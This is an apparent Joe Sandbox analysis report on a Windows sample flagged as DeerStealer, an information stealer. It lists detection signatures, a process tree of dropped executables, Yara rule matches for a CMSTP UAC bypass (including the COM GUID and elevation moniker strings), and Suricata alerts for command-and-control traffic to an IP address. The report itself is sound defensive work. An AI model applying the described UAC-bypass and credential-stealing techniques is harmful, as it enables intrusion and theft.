Edit tour

Windows Analysis Report
9mauyKC3JW.exe

Overview

General Information

Sample name:	9mauyKC3JW.exe renamed because original name is a hash value
Original sample name:	ae130c89b7d8c4c9fd06422faeb79fc9.exe
Analysis ID:	1581191
MD5:	ae130c89b7d8c4c9fd06422faeb79fc9
SHA1:	b5fdcc9e63448dd0f68b75b7bf54ff3fef94623c
SHA256:	b13a4e5207954eaeb6aaf32e333a4f366a86afc0779406c9bf17805d5b83e2e9
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

9mauyKC3JW.exe (PID: 7820 cmdline: "C:\Users\user\Desktop\9mauyKC3JW.exe" MD5: AE130C89B7D8C4C9FD06422FAEB79FC9)

hv.exe (PID: 7940 cmdline: "C:\Users\user\AppData\Local\Temp\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)

hv.exe (PID: 7960 cmdline: C:\Users\user\AppData\Roaming\Chromewizard\hv.exe MD5: 480F8CF600F5509595B8418C6534CAF2)

cmd.exe (PID: 7996 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Localdockerv3.exe (PID: 1296 cmdline: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe MD5: 967F4470627F823F4D7981E511C9824F)

hv.exe (PID: 1612 cmdline: "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)

cmd.exe (PID: 3344 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

hv.exe (PID: 3324 cmdline: "C:\Users\user\AppData\Roaming\Chromewizard\hv.exe" MD5: 480F8CF600F5509595B8418C6534CAF2)

cmd.exe (PID: 2940 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Localdockerv3.exe (PID: 4080 cmdline: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe MD5: 967F4470627F823F4D7981E511C9824F)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000A.00000002.1869821197.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000004.00000002.1776755377.0000000005769000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: Localdockerv3.exe PID: 1296	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.cmd.exe.2d607f8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.cmd.exe.2d607f8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x10f60:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x10f28:$s2: Elevation:Administrator!new:
8.2.Localdockerv3.exe.284faed.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Localdockerv3.exe.284faed.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f20b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f296:$s1: CoGetObject 0x25f1ef:$s2: Elevation:Administrator!new:
10.2.cmd.exe.2c34a28.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.cmd.exe.2c34a28.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x139f30:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x139ef8:$s2: Elevation:Administrator!new:
20.2.Localdockerv3.exe.2788a20.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.Localdockerv3.exe.2788a20.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a42d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a4363:$s1: CoGetObject 0x2a42bc:$s2: Elevation:Administrator!new:
20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e60b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e696:$s1: CoGetObject 0x25e5ef:$s2: Elevation:Administrator!new:
8.2.Localdockerv3.exe.28506ed.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Localdockerv3.exe.28506ed.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25e60b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25e696:$s1: CoGetObject 0x25e5ef:$s2: Elevation:Administrator!new:
8.2.Localdockerv3.exe.280aa20.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
8.2.Localdockerv3.exe.280aa20.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x2a42d8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x2a4363:$s1: CoGetObject 0x2a42bc:$s2: Elevation:Administrator!new:
20.2.Localdockerv3.exe.27cdaed.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
20.2.Localdockerv3.exe.27cdaed.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x25f20b:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x25f296:$s1: CoGetObject 0x25f1ef:$s2: Elevation:Administrator!new:
Click to see the 11 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:15:52.621984+0100	2028371	3	Unknown Traffic	192.168.2.8	49711	172.67.153.243	443	TCP
2024-12-27T08:15:55.284043+0100	2028371	3	Unknown Traffic	192.168.2.8	49713	172.67.153.243	443	TCP
2024-12-27T08:15:57.338216+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	172.67.153.243	443	TCP
2024-12-27T08:16:05.356520+0100	2028371	3	Unknown Traffic	192.168.2.8	49716	172.67.153.243	443	TCP
2024-12-27T08:16:08.819571+0100	2028371	3	Unknown Traffic	192.168.2.8	49717	172.67.153.243	443	TCP
2024-12-27T08:16:10.842099+0100	2028371	3	Unknown Traffic	192.168.2.8	49718	172.67.153.243	443	TCP
2024-12-27T08:16:12.781810+0100	2028371	3	Unknown Traffic	192.168.2.8	49719	172.67.153.243	443	TCP
2024-12-27T08:16:14.704165+0100	2028371	3	Unknown Traffic	192.168.2.8	49720	172.67.153.243	443	TCP
2024-12-27T08:16:17.109798+0100	2028371	3	Unknown Traffic	192.168.2.8	49721	172.67.153.243	443	TCP
2024-12-27T08:16:19.577127+0100	2028371	3	Unknown Traffic	192.168.2.8	49722	172.67.153.243	443	TCP
2024-12-27T08:16:23.630281+0100	2028371	3	Unknown Traffic	192.168.2.8	49723	172.67.153.243	443	TCP

ET MALWARE Win32/DeerStealer CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-27T08:15:53.549685+0100	2056550	1	A Network Trojan was detected	192.168.2.8	49711	172.67.153.243	443	TCP
2024-12-27T08:16:24.333173+0100	2056550	1	A Network Trojan was detected	192.168.2.8	49723	172.67.153.243	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\iepdf32.dll	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dll	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: 9mauyKC3JW.exe	Virustotal: Detection: 29%			Perma Link
Source: 9mauyKC3JW.exe	ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\yhg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\cvnmq	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 10.2.cmd.exe.2d607f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Localdockerv3.exe.284faed.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.cmd.exe.2c34a28.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Localdockerv3.exe.2788a20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Localdockerv3.exe.27ce6ed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Localdockerv3.exe.28506ed.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Localdockerv3.exe.280aa20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Localdockerv3.exe.27cdaed.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1869821197.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1776755377.0000000005769000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Localdockerv3.exe PID: 1296, type: MEMORYSTR

Source: 9mauyKC3JW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.153.243:443 -> 192.168.2.8:49723 version: TLS 1.2

Source:	Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\41\89\Local State source: Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1971403578.0000000000B26000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: [\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: j\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.iniiiNp source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: H\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.iniAC source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ls\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State-;}P source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "winload_prod.pdb3 source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.inid~} source: Localdockerv3.exe, 00000008.00000003.1997630296.0000000000A9D000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: CC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\crosoft.WindowsAlarms source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: Localdockerv3.exe, 00000008.00000003.2071965811.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160661904.0000000000A93000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2113703918.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2091618343.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: hv.exe, 00000002.00000002.1491958833.000000000CD00000.00000004.00000800.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1475378967.0000000004002000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1776635840.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.1777986969.0000000005A50000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: D:\a\pdfium-binaries\pdfium-binaries\pdfium\out\pdfium.dll.pdb source: 9mauyKC3JW.exe, 00000000.00000003.1445162198.0000000003345000.00000004.00000020.00020000.00000000.sdmp, hv.exe, 00000002.00000003.1460868437.000000000D1E2000.00000004.00000001.00020000.00000000.sdmp, hv.exe, 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmp, hv.exe, 00000003.00000002.1553119306.000000006C703000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\cs source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: Localdockerv3.exe, 00000008.00000003.1984341429.000000000852C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbloaded source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
